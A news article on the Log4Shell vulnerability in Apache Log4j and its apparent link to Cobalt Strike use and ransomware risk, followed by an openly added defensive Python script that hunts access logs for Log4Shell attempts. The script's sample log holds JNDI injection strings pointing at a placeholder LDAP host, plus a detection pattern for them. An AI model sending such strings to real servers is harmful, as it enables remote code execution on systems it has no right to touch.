At the time of this writing, no ransomware groups are publicly known to have exploited the vulnerability in Log4j to deploy a ransomware attack.

The Log4Shell vulnerability was revealed late Thursday and impacts a broad swath of enterprise software and cloud services. The vulnerability affects any application that uses Apache Log4j, an open source logging library, and many applications and services written in Java are potentially vulnerable.

Along with being widespread, the flaw is also considered highly dangerous because it’s seen as fairly easy to exploit. The remote code execution (RCE) vulnerability can ultimately enable an attacker to remotely access and control devices.

In its blog post published Saturday, Microsoft said that “at the time of publication, the vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed.” In particular, “Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems,” the company said.

Microsoft did not provide further details on the attacks. VentureBeat has reached out to Microsoft for any updated information.

Along with providing some of the largest platforms and cloud services used by businesses, Microsoft is a major cybersecurity vendor in its own right with 650,000 security customers.

Microsoft’s report of seeing Cobalt Strike installation is notable because the tool is “commonly abused by targeted ransomware,” said Chris Doman, cofounder and chief technology officer at cyber vendor Cado Security, in an email to VentureBeat.

Popular with cybercriminals

Cobalt Strike was originally a legitimate tool for penetration testing, but a leaked version of the platform’s source code reportedly appeared on GitHub in late 2020, and researchers say the tool has increasingly been leveraged by cybercriminals.

Use of Cobalt Strike by threat actors surged 161% in 2020, year over year, according to a recent report from Proofpoint. And the tool has been “appearing in Proofpoint threat data more frequently than ever” in 2021, the company said.

Many security researchers, including those at Cisco Talos, VMware Carbon Black, and Accenture Security, have reported a significant correlation between the use of Cobalt Strike and ransomware attacks.

The Cobalt Strike tool is useful both because of its effectiveness (the tool launches a “beacon” enabling actions such as remote surveillance and lateral movement) and because of the “anonymity” it offers due to its popularity, VMware and Accenture researchers said in a recent threat research post.

“As the use of Cobalt Strike increases among ransomware operators, Accenture Security and Carbon Black have, in turn, observed attackers use Cobalt Strike Beacon capabilities, such as named pipes over Server Message Block (SMB) and WinRM to move laterally in targeted networks,” the researchers said in the post.

Ransomware threat

Deployment of malware that takes advantage of Log4Shell has already begun, with researchers reporting they’ve observed the use of Mirai and Muhstik botnets to deploy distributed denial of service (DDoS) attacks, as well as deployment of Kinsing malware for crypto mining.

It may only be a “matter of days” before ransomware might be deployed in connection with the vulnerability in Log4j, said David Warshavski, vice president of enterprise security at cybersecurity vendor Sygnia, in an email to VentureBeat.

Due to the broad reach of the vulnerability in Log4j, “the bar for ransomware threat actors to breach enterprise networks and establish an initial foothold has been lowered significantly,” Warshavski said.

The vulnerability comes with the majority of businesses already reporting that they’ve had first-hand experience with ransomware over the past year. A recent survey from CrowdStrike found that 66% of organizations had experienced a ransomware attack in the previous 12 months, up from 56% in 2020. And the average ransomware payment has surged by about 63% in 2021, reaching $1.79 million, the report said.

In terms of Log4Shell, managed detection and response firm Huntress so far has “not seen any serious attacks on our partners and their customers,” said Roger Koehler, vice president of threat ops at the company, in an email. “It’s a little early to hear of anything serious right now,” Koehler said. However, “this is just the beginning, and we will be seeing this for a long time,” Koehler said.

Cisco Talos said it has discovered attacker activity related to the Log4Shell vulnerability starting on December 2. Researchers have also said that exploits of the vulnerability may have begun as far back as December 1 or December 2. “It is recommended that organizations expand their hunt for scanning and exploit activity to this date,” Talos researchers said.
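As an added example (not from the article, and not code from Talos, Microsoft or any other vendor quoted), the Python helper below shows what the Talos recommendation to expand the hunt back to early December amounts to in practice: it reads web access log lines, keeps only those dated from December 1, 2021 onward (the earliest date the article's sources name), and flags lines carrying the well-known `${jndi:` lookup prefix that Log4Shell scanning and exploit attempts contain, checking the URL-decoded form as well so that percent-encoded attempts are not missed. The log format, the IP addresses and the log lines themselves are constructed for this example, and the pattern list is an assumption that an operator would tune against vendor detection guidance.

```python
"""
Hunt helper: flag access log lines that look like Log4Shell scanning or
exploit attempts, restricted to a hunting window that starts on the earliest
date the article's sources cite (December 1, 2021).
"""
import re
import urllib.parse
from datetime import date, datetime
from typing import Dict, List, Optional

# Start of the hunting window: December 1, 2021, the earliest date the
# article's sources name for possible exploitation.
HUNT_START = date(2021, 12, 1)

# Well-known lookup prefix carried by Log4Shell scanning/exploit strings.
# Matched case-insensitively. Assumption: an operator extends this list from
# vendor detection guidance; it is deliberately minimal here.
PATTERNS = [re.compile(r"\$\{jndi:", re.IGNORECASE)]

# Constructed sample log lines (invented for this example, not real traffic).
# Format assumed: "<ISO8601 timestamp> <client IP> <method> <path> <user-agent>"
SAMPLE_LOG = """\
2021-11-30T23:59:58Z 198.51.100.7 GET / "Mozilla/5.0"
2021-12-01T08:15:02Z 203.0.113.9 GET /login "${jndi:ldap://example.invalid/a}"
2021-12-02T10:41:11Z 203.0.113.9 GET /api "%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fb%7D"
2021-12-03T12:00:00Z 192.0.2.44 GET /health "curl/7.79.1"
"""


def parse_line(line: str):
    """Split a line into its timestamp and the remainder (assumed format above)."""
    ts_str, rest = line.split(" ", 1)
    return datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ"), rest


def is_suspicious(text: str) -> bool:
    """True if any pattern matches the raw text or its URL-decoded form."""
    decoded = urllib.parse.unquote(text)
    return any(p.search(text) or p.search(decoded) for p in PATTERNS)


def hunt(log_text: str, start: date = HUNT_START) -> List[Dict[str, str]]:
    """Return flagged lines dated on or after `start`, oldest first."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, rest = parse_line(line)
        if ts.date() < start:
            continue  # outside the hunting window
        if is_suspicious(rest):
            hits.append({
                "timestamp": ts.isoformat(),
                "source": rest.split(" ", 1)[0],
                "line": line,
            })
    return hits


def earliest_hit(hits: List[Dict[str, str]]) -> Optional[str]:
    """Date (YYYY-MM-DD) of the earliest flagged line, or None if none."""
    if not hits:
        return None
    return min(h["timestamp"] for h in hits)[:10]


if __name__ == "__main__":
    found = hunt(SAMPLE_LOG)
    for h in found:
        print(h["timestamp"], h["source"], h["line"])
    print("earliest flagged activity:", earliest_hit(found))
```

Running it on the constructed sample flags two lines, both from the same source address, and reports December 1 as the earliest flagged date; narrowing the window to December 2 drops the first. The same structure applies to a real log export by replacing `SAMPLE_LOG` with the file contents and adjusting `parse_line` to the actual log format.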